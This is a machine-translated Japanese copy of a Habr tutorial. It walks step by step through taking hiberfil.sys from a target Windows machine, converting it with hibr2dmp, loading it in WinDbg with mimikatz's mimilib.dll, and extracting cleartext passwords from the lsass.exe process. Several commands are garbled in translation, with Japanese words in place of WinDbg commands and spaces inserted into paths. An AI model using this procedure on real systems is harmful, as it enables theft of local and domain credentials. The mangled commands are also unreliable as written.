hiberfil.sysからのローカルおよびドメインパスワードの回復

オープンフォームでLSAからWindows資格情報を抽出できるmimikatzユーティリティは、2012年から存在していますが、実行中のOSのメモリからパスワードを回復するための明るい機能に加えて、もう1つのかなり興味深い機能があります。 次に、簡単な手順を使用してhiberfil.sysファイルから資格情報を抽出する方法について、順を追って説明します。

準備する


計画を実施するには、次のユーティリティが必要です。

アクション


1.ターゲットマシンからhiberfil.sysファイルを取得します。

2.ファイルをWinDbgが理解できる形式に変換します。

hibr2dmp.exe d:\ temp \ hiberfil.sys c:\ temp \ hiberfil.dmp

このプロセスにはかなり時間がかかる場合があります。

画像

3. WinDbgを実行し、結果のファイルを開きます。

ファイル->クラッシュダンプを開く

4.デバッグシンボルを構成します。

ファイル->シンボルファイルパス...を開き、次の行を入力します。

SRV * c:\シンボル* http://msdl.microsoft.com/download/symbols

画像

c:\シンボルの代わりに、当然、シンボルがロードされるディレクトリがあります

デバッガーのコマンドラインでは、次のように記述します。

0:kd> .reload / n

キャラクターのロードを待っています:

画像

5. mimilib.dllライブラリへのパスを指定します(mimikatzのあるディレクトリにあります)。

0:kd> .load z:\ Soft \ Security \ Passwords \ Mimikatz \ x64 \ mimilib.dll

画像

6. lsass.exeプロセスのアドレスを見つけます。

0:kd> !プロセス0 0 lsass.exe

画像

この場合、アドレスはfffffa800a7d9060です。

7.プロセスのコンテキストを切り替えます。

0:kd> .process / r / p fffffa800a7d9060

画像

8. mimikatzを実行し、クリアテキストでパスワードを取得します。

0:kd> !ミミカッツ

画像

関連リンク


Microsoft Windows資格情報開示: http : //www.securitylab.ru/vulnerability/420418.php
LSA認証: https : //msdn.microsoft.com/en-us/library/windows/desktop/aa378326(v=vs.85).aspx
:何のための認証ダイジェストですhttps://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx

Source: https://habr.com/ru/post/J250999/


All Articles